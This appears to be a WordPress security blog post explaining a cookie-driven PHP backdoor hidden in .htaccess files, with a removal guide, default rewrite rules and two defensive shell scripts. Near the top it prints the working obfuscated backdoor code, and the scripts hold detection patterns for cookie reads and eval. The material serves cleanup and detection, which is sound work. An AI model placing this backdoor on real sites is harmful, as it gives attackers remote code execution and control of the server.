Htaccess Malware: Cookie-Based PHP Backdoor Explained (With Removal Guide)

Published on 11/18/2025
MD Pabel

If your WordPress site is redirecting visitors, showing strange pop-ups, or getting flagged by Google, it may be infected with Htaccess Malware: Cookie-Based PHP Backdoor. This post explains what this malware is, how it works, how to remove it safely, and how to prevent reinfection. The language is simple so site owners can follow each step.

What is the Cookie-Based PHP Backdoor?

This is a malicious PHP backdoor stored inside a file named .htaccess or hidden in other files. A normal .htaccess file should never contain PHP code. Attackers place obfuscated PHP that builds and executes code from cookie values, giving them remote control over the site.

Example of the obfuscated code

<?php $c = $_COOKIE; $k = 0; $n = 5; $p = array(); $p[$k] = ''; while($n) { $p[$k] .= $c[36][$n]; if(!$c[36][$n+1]) { if(!$c[36][$n+2]) break; $k++; $p[$k] = ''; $n++; } $n = $n + 5 + 1; } $k = $p[0]() . $p[25]; if(!$p[18]($k)) { $n = $p[1]($k, $p[8]); $p[14]($n, $p[2] . $p[9]($p[7]($c[3]))); } include($k);

How this malware works (simple)

  • The attacker sends specially crafted cookies to the site.
  • The obfuscated PHP reads those cookie values and reconstructs a PHP script or command.
  • The reconstructed script is saved or executed on the server, creating a backdoor.
  • The attacker can then upload files, run commands, create admin users, or reinfect the site.

Where the malware usually hides

Attackers place fake or modified .htaccess files or hidden PHP files in folders that are commonly writable:

  • /wp-content/uploads/
  • /wp-content/plugins/
  • /wp-content/themes/
  • /wp-admin/
  • The site root (public_html/.htaccess) — if it contains PHP code, it’s suspicious

Common symptoms site owners see

  • Site redirects to unfamiliar pages (ads, scams, adult sites)
  • Google Search Console shows “site hacked” or security warnings
  • Antivirus tools block the domain
  • Slow site performance or unexplained CPU spikes
  • Unknown admin users in WordPress
  • New or hidden files appear in uploads or plugin folders

Step-by-step removal guide (safe method)

Follow these steps carefully. If you are not confident, hire a professional.

    • Backup everything first: export a full site backup (files + database). Work on a copy if possible.
    • Inspect and restore the main .htaccess: check /public_html/.htaccess. If it contains PHP code, delete it and replace it with the default WordPress rules:
      # BEGIN WordPress
      <IfModule mod_rewrite.c>
      RewriteEngine On
      RewriteBase /
      RewriteRule ^index\.php$ - [L]
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule . /index.php [L]
      </IfModule>
      # END WordPress
    • Find and remove fake .htaccess files: search inside /wp-content/uploads/, /wp-content/plugins/, and /wp-content/themes/. Delete any .htaccess that contains PHP, base64 strings, long obfuscated variables, or unknown code.
    • Scan and remove other malicious files: use Wordfence, Sucuri, or your host’s malware scanner to identify suspicious PHP files. Manually review and remove files that you did not add.
    • Replace core WordPress files: download a fresh copy of WordPress and replace the /wp-admin/ and /wp-includes/ folders. Do not replace /wp-content/ unless you are sure.
    • Check uploads and themes: inspect uploads for unexpected PHP files. Remove PHP files from uploads — uploads should contain images and media only.
    • Change all passwords: reset WordPress admin passwords, hosting control panel, FTP/SFTP, and database passwords. Remove unknown admin users.
    • Harden the site: disable file editing in wp-config, enable two-factor authentication, and install a firewall plugin (for example, Wordfence or equivalent).
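The two searches in the steps above (PHP inside any .htaccess, and PHP scripts inside the uploads folder) can be scripted so that nothing is missed in a large tree. The following shell script is an added example and not code from the original post. The document-root paths in the usage comment are assumptions for your own server; the demo tree it builds is constructed, with inert stand-in contents that only contain the textual indicators.

```shell
#!/bin/sh
# Added example, not code from the original post. Scans a WordPress tree for
# the two indicators the removal steps look for: PHP inside any .htaccess
# file, and PHP scripts inside wp-content/uploads. Paths are assumptions.

# Indicators: a PHP open tag, cookie-driven input, common decoders, or a
# dynamic call such as $p[0]( built from an array of string fragments.
INDICATORS='<\?php|\$_COOKIE|base64_decode|eval\(|\$[A-Za-z_]+\[[0-9]+]\('

# List every .htaccess under $1 whose contents match the indicators.
# A clean .htaccess holds only Apache directives and never matches.
find_suspicious_htaccess() {
    find "$1" -type f -name .htaccess -exec grep -lE "$INDICATORS" {} + 2>/dev/null | sort
}

# List PHP-like files under the uploads directory $1; uploads should hold media only.
find_php_in_uploads() {
    find "$1" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.php[0-9]' \) 2>/dev/null | sort
}

# Build a constructed demo tree in a temp directory and print its path.
# File contents are inert stand-ins carrying the indicators, not working code.
build_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2025/11" "$root/wp-content/plugins/demo"
    # clean default rules in the site root: must NOT be reported
    printf '# BEGIN WordPress\nRewriteEngine On\n# END WordPress\n' > "$root/.htaccess"
    # constructed indicator: PHP tag and a cookie read inside an uploads .htaccess
    printf '<?php $c = $_COOKIE; /* constructed sample */\n' > "$root/wp-content/uploads/.htaccess"
    # constructed indicator: a PHP file where only media belongs
    printf '<?php /* constructed sample */\n' > "$root/wp-content/uploads/2025/11/image.php"
    printf 'image-bytes\n' > "$root/wp-content/uploads/2025/11/photo.jpg"
    # legitimate plugin code outside uploads: must NOT be reported by either search
    printf '<?php /* plugin code */\n' > "$root/wp-content/plugins/demo/demo.php"
    echo "$root"
}

# Usage on a real site (review every hit by hand before deleting anything):
#   find_suspicious_htaccess /var/www/html
#   find_php_in_uploads /var/www/html/wp-content/uploads
```

Treat every hit as a lead, not a verdict: open the file and read it before removing it, and keep a copy of anything you delete so the entry point can still be traced afterwards.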

How to prevent reinfection

  • Keep WordPress, plugins, and themes updated.
  • Avoid nulled or pirated plugins and themes.
  • Use strong, unique passwords and 2FA for admin accounts.
  • Limit write permissions to only necessary folders and use correct file permissions.
  • Take regular backups and store them offsite.
  • Use a web application firewall (WAF) and security plugin.
  • Monitor logs and set alerts for new files in uploads and plugin folders.
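The last point, alerting on new files in uploads and plugin folders, is easiest to implement as a file-integrity baseline: hash every file once the site is clean, store the manifest, and diff later runs against it. The script below is an added example and not code from the original post; the directory names in the usage comment are assumptions for your own document root, and the demonstration tree it builds is constructed.

```shell
#!/bin/sh
# Added example, not code from the original post. Implements the "alert on new
# files in uploads and plugin folders" advice as a file-integrity baseline.
# Directory names are assumptions for your own document root.

# Use sha256sum where it exists (Linux); fall back to shasum (macOS, BSD).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi
}

# Print "hash  ./relative/path" for every regular file under $1, sorted by path.
# Paths containing whitespace are not handled by the awk field split below.
make_baseline() {
    ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do hash_file "$f"; done )
}

# Compare directory $1 against baseline manifest $2 and print one line per
# difference: ADDED (the signal this post cares about), CHANGED, REMOVED.
compare_baseline() {
    current=$(mktemp)
    make_baseline "$1" > "$current"
    awk '
        FILENAME == ARGV[1] { old[$2] = $1; next }   # first file: stored baseline
        { new[$2] = $1 }                              # second file: current state
        END {
            for (p in new) if (!(p in old))                    print "ADDED   " p
            for (p in new) if ((p in old) && old[p] != new[p]) print "CHANGED " p
            for (p in old) if (!(p in new))                    print "REMOVED " p
        }' "$2" "$current" | sort
    rm -f "$current"
}

# Constructed demonstration: a fake uploads folder, a baseline, then three
# changes (a dropped PHP file, an edited image, a deleted image). Prints the report.
demo_run() {
    root=$(mktemp -d)
    mkdir -p "$root/uploads/2025/11"
    printf 'image-bytes\n' > "$root/uploads/2025/11/photo.jpg"
    printf 'image-bytes\n' > "$root/uploads/2025/11/banner.jpg"
    printf 'image-bytes\n' > "$root/uploads/2025/11/old.jpg"
    make_baseline "$root/uploads" > "$root/baseline.txt"
    printf '<?php /* constructed sample */\n' > "$root/uploads/2025/11/cache.php"  # new file
    printf 'modified-bytes\n' > "$root/uploads/2025/11/banner.jpg"                 # changed
    rm "$root/uploads/2025/11/old.jpg"                                              # removed
    compare_baseline "$root/uploads" "$root/baseline.txt"
    rm -rf "$root"
}

# Usage once the site is clean:
#   make_baseline /var/www/html/wp-content/uploads > uploads.baseline
# Later, for example from cron, and alert on any non-empty output:
#   compare_baseline /var/www/html/wp-content/uploads uploads.baseline
```

Store the baseline manifest outside the web root (or off the server), since an attacker who can write to uploads can also rewrite a manifest kept beside them; any ADDED line ending in .php under uploads deserves immediate attention.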

When to call a professional

If the infection keeps returning after cleanup, if you cannot locate the entry point, or if your host suspended the site, hire an experienced malware removal specialist. This variant often hides additional backdoors that require thorough manual cleanup.

Final thoughts

Htaccess Cookie-Based PHP Backdoor is dangerous because it runs early and gives attackers remote code execution through crafted cookies. Cleaning it properly and fixing the root vulnerability is essential to stop reinfection. If you want, I can provide a downloadable clean .htaccess file and a follow-up checklist you can paste into your control panel.

If your website is infected with htaccess malware or a cookie-based PHP backdoor, I offer fast and guaranteed WordPress malware removal with 100% reinfection protection — contact me anytime for same-day cleanup.


About the Author

MD Pabel


MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With over 7 years of experience, he has completed more than 3200 projects, served over 2300 clients, and resolved 4500+ cases of malware and hacked websites.